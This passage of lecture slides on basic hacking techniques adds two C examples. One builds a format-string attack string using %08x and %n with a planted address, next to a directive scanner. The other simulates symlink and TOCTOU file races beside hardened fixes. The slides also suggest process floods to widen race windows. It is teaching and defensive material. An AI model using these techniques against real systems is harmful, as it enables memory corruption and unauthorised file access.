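Two things around `printf(hello)`, as an added example that is not part of the slides. First a scanner that tells you whether untrusted text carries format directives at all, the check to run before such text can reach a format slot (the fix itself is `printf("%s", hello)`). Second a model of the argument walk from the last two slides: each directive takes one word from where the arguments would be, so with the format string lying a few words up the stack, a run of `%08x` followed by `%n` makes `%n` use the bytes at the start of the string as its pointer. The stack contents are constructed, not captured from a process, and the host is assumed little-endian.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Scan s for conversion directives. Returns their count; *writes gets the
 * number of %n directives, the ones that store to memory. "%%" is a literal
 * percent and is skipped. */
static int scan_directives(const char *s, int *writes) {
    int n = 0;
    *writes = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        s++;
        if (*s == '%') continue;                               /* "%%" */
        while (*s && strchr("0123456789.-+ #$hlLqjzt", *s)) s++;  /* flags, width, precision, length */
        if (!*s) break;
        n++;
        if (*s == 'n') (*writes)++;
    }
    return n;
}

/* The checks to run on untrusted text before it can become a format. */
static int count_directives(const char *s) { int w; return scan_directives(s, &w); }
static int count_writes(const char *s)     { int w; scan_directives(s, &w); return w; }

/* Model of the argument walk. 'stack' holds the 32-bit words printf would
 * consume as successive arguments. Every directive takes one word; %n takes
 * one and uses it as the address to write to. Returns that address, or 0 if
 * no %n is reached. */
static uint32_t n_target(const char *fmt, const uint32_t *stack, size_t words) {
    size_t next = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;
        while (*p && strchr("0123456789.-+ #hl", *p)) p++;
        if (!*p || next >= words) break;
        uint32_t arg = stack[next++];
        if (*p == 'n') return arg;
    }
    return 0;
}

/* The layout of the previous slide, constructed: five words of other frame
 * data, then the caller's buffer holding the format string itself (the bytes
 * form little-endian words, as on x86). */
static uint32_t slide_target(const char *fmt) {
    uint32_t stack[32] = { 0x00000001, 0x0804a010, 0x00000000, 0xbfffd4c8, 0x00000080 };
    size_t room = sizeof stack - 5 * sizeof stack[0];
    size_t len = strlen(fmt);
    memcpy(&stack[5], fmt, len < room ? len : room);
    return n_target(fmt, stack, sizeof stack / sizeof stack[0]);
}

int main(void) {
    const char *attack = "\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n";
    printf("directives: %d, of which %%n: %d\n",
           count_directives(attack), count_writes(attack));
    printf("%%n would write to 0x%08x\n", slide_target(attack));
    printf("one %%08x fewer: 0x%08x\n",
           slide_target("\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%n"));
    return 0;
}
```

The second call in `main` shows why the number of `%08x` matters: one too few and `%n` dereferences whatever frame word sits before the format string instead of the address you planted.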

82
Basic hacking techniques
  • Time-of-check-to-time-of-use (TOCTOU)
  • Known since 1996 but really rediscovered in 2004
  • You are going to hear a lot about them in the future
  • Change the world in the time between checking
    and using

83
Basic hacking techniques
  • TOCTOU
  • Target code
    if (hasAccess(file))
        stream = open(file, O_RDONLY);
  • What's wrong????

84
Basic hacking techniques
  • TOCTOU
  • Target code
    if (hasAccess(file))
        stream = open(file, O_RDONLY);
  • Time passes between the access check and the open

85
Basic hacking techniques
  • Exploiting
    file = "/tmp/temp";                 // symlink to own file
    if (hasAccess(file))
        // change the symlink to the target here
        stream = open(file, O_RDONLY);
  • Main trick: getting the timing right
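Both file races on this page run against a scratch directory under /tmp, as an added example that is not part of the slides: the symlink race from the temp-file slides (a privileged program truncates its temp file through a planted link) and the `hasAccess(file)` then `open(file)` TOCTOU above, each beside its hardened form. The attacker's move is simulated by a call placed in the race window, so timing does not matter here; the victim file, the `/tmp/race.XXXXXX` directory and the "secret"/"decoy" contents are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Temp-file slides, vulnerable: "program just overwrites it". Create or
 * truncate, following links, so a planted symlink redirects the write. */
static int tmp_write_unsafe(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, data, strlen(data));
    close(fd);
    return w == (ssize_t)strlen(data) ? 0 : -1;
}

/* Hardened: create-only and never follow a link. EEXIST means something was
 * planted at that name; pick another (or use mkstemp()). */
static int tmp_write_safe(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, data, strlen(data));
    close(fd);
    return w == (ssize_t)strlen(data) ? 0 : -1;
}

static int read_fd(int fd, char *out, size_t cap) {
    ssize_t r = read(fd, out, cap - 1);
    close(fd);
    if (r < 0) return -1;
    out[r] = '\0';
    return 0;
}

/* The attacker's move inside the race window: repoint the name at the target. */
static void repoint(const char *path, const char *target) {
    unlink(path);
    symlink(target, path);
}

/* TOCTOU slides, vulnerable: check the name, then use the name. */
static int read_checked_unsafe(const char *path, const char *secret,
                               char *out, size_t cap) {
    if (access(path, R_OK) != 0) return -1;   /* check passes: attacker's own file */
    repoint(path, secret);                    /* attacker wins the window */
    int fd = open(path, O_RDONLY);            /* use: follows the new link */
    return fd < 0 ? -1 : read_fd(fd, out, cap);
}

/* Hardened: open once without following links, then verify that the object
 * actually opened (fstat on the descriptor) is the one checked (lstat on the
 * name). A swapped-in symlink fails the open with ELOOP; a swapped-in file
 * fails the inode comparison. */
static int read_checked_safe(const char *path, const char *secret,
                             char *out, size_t cap) {
    struct stat before, after;
    if (lstat(path, &before) != 0 || !S_ISREG(before.st_mode)) return -1;
    repoint(path, secret);                    /* same attacker move */
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (fstat(fd, &after) != 0 || after.st_ino != before.st_ino ||
        after.st_dev != before.st_dev) { close(fd); return -1; }
    return read_fd(fd, out, cap);
}

/* Constructed scratch setup: fresh directory, a victim file holding "secret",
 * and at 'path' either a pre-planted symlink to it or the attacker's own file. */
static int scratch(char *dir, char *victim, char *path, int plant_link) {
    strcpy(dir, "/tmp/race.XXXXXX");
    if (!mkdtemp(dir)) return -1;
    sprintf(victim, "%s/victim", dir);
    sprintf(path, "%s/tmp", dir);
    if (tmp_write_unsafe(victim, "secret") != 0) return -1;
    return plant_link ? symlink(victim, path) : tmp_write_unsafe(path, "decoy");
}

static void cleanup(const char *dir, const char *victim, const char *path) {
    unlink(path); unlink(victim); rmdir(dir);
}

/* 1 if a temp write through the planted link changed the victim, 0 if not. */
static int victim_clobbered(int (*writer)(const char *, const char *)) {
    char dir[64], victim[80], path[80], buf[32];
    if (scratch(dir, victim, path, 1) != 0) return -1;
    writer(path, "temp data");
    int fd = open(victim, O_RDONLY);
    if (fd < 0 || read_fd(fd, buf, sizeof buf) != 0) return -1;
    cleanup(dir, victim, path);
    return strcmp(buf, "secret") != 0;
}

/* 1 if the checked read handed back the secret, 0 if it refused or read the decoy. */
static int secret_leaked(int (*reader)(const char *, const char *, char *, size_t)) {
    char dir[64], victim[80], path[80], buf[32];
    if (scratch(dir, victim, path, 0) != 0) return -1;
    int rc = reader(path, victim, buf, sizeof buf);
    cleanup(dir, victim, path);
    return rc == 0 && strcmp(buf, "secret") == 0;
}

int main(void) {
    printf("O_TRUNC temp write:      victim clobbered = %d\n", victim_clobbered(tmp_write_unsafe));
    printf("O_EXCL|O_NOFOLLOW write: victim clobbered = %d\n", victim_clobbered(tmp_write_safe));
    printf("access() then open():    secret leaked = %d\n", secret_leaked(read_checked_unsafe));
    printf("lstat/O_NOFOLLOW/fstat:  secret leaked = %d\n", secret_leaked(read_checked_safe));
    return 0;
}
```

The common thread in both fixes is to stop re-resolving a path name: create with `O_EXCL` so an existing object is an error, and check the descriptor you hold rather than the name you were given.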

86
Basic hacking techniques
  • Create a maze of symlinks to keep the OS busy, and
    pump the machine full of processes so it slows
    down

87
Basic hacking techniques
  • Create a maze of symlinks to keep the OS busy, and
    pump the machine full of processes so it slows
    down
  • With the right tactics, 70% chance of entry

88
REMEMBER
  • GET PERMISSION first, then try.
  • The government is itching to get a hacker
    prosecuted (good PR). So they're itching to arrest
    anyone stepping out of line.
  • The permission to hack the server is now revoked.
    Please do not try to hack that IP anymore; the
    server isn't there anymore

89
Conclusions
  • Try to think beyond the obvious
  • Don't believe in security through obscurity
  • Try to program defensively
  • Review code by other people and look for these
    kinds of mistakes (you will be better able to find
    them now that you know them)
  • And if possible, use managed languages and/or
    stack/heap protectors

90
Pointers
  • Buffer overflows in more detail
  • www.maths.leeds.ac.uk/read/bofs.html
  • TOCTOU
  • www.cs.berkeley.edu/nks/papers/races-usenix05.pdf
  • General news
  • www.securityfocus.com
  • This presentation
  • wwwhome.cs.utwente.nl/huismanrlr/inter-actief/